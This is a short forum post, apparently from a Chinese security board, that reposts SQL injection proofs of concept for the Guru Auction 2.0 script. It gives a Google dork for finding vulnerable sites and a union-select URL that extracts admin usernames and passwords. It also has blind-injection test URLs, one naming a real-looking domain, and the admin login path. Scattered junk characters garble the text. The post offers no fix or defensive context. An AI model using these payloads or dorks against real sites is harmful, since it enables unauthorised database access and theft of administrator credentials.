Guru Auction 2.0 Multiple SQL Injection Vulnerabilities! Q) T! z5 t$ C" X
+ q" A+ U( K7 A
作者 : v3n0m- T# ]3 c$ F2 s9 Z# Y/ q8 w( |
应用 : Guru Auction 2.0+ [6 N) s) x; C' {3 F
Price : $49
" k8 P: z6 n9 s" z% P' G" |Vendor : http://www.guruscript.com/
; E) I+ p1 G U$ u5 M) gGoogle Dork : inurl:subcat.php?cate_id=
6 H# H$ w$ U/ x/ Q. l, E7 f D1 {; m P& t6 h8 C
SQLi p0c:
3 X6 M3 |6 k# V" q) O; C4 t% t~~~~~~~~~~* ?+ z' ^) J' T* b! N( N- k! t$ J; [
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--: A0 p5 U) p3 u6 [
$ y* ^/ e+ p L' u3 W
0 v5 `# A* t& r& A盲注 p0c: [/ m2 U% D3 v% j5 a& l. b, F7 h
~~~~~~~~~~ f2 U; r% S! S
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
0 h: l$ S* r3 U; u. C$ t9 ?1 Jhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false9 A4 r- Y |" L/ l
8 D |* d9 I. J, r1 M R& e& N7 ~
管理登录入口:
" G4 E7 N A# {7 b2 e' ?1 d~~~~~~~~~~
; W9 P0 J) o0 jhttp://domain.tld/[path]/admin/
: J/ r% M2 L# Y" d! v |
发表于 2012-12-31 09:24:05
收藏
支持
反对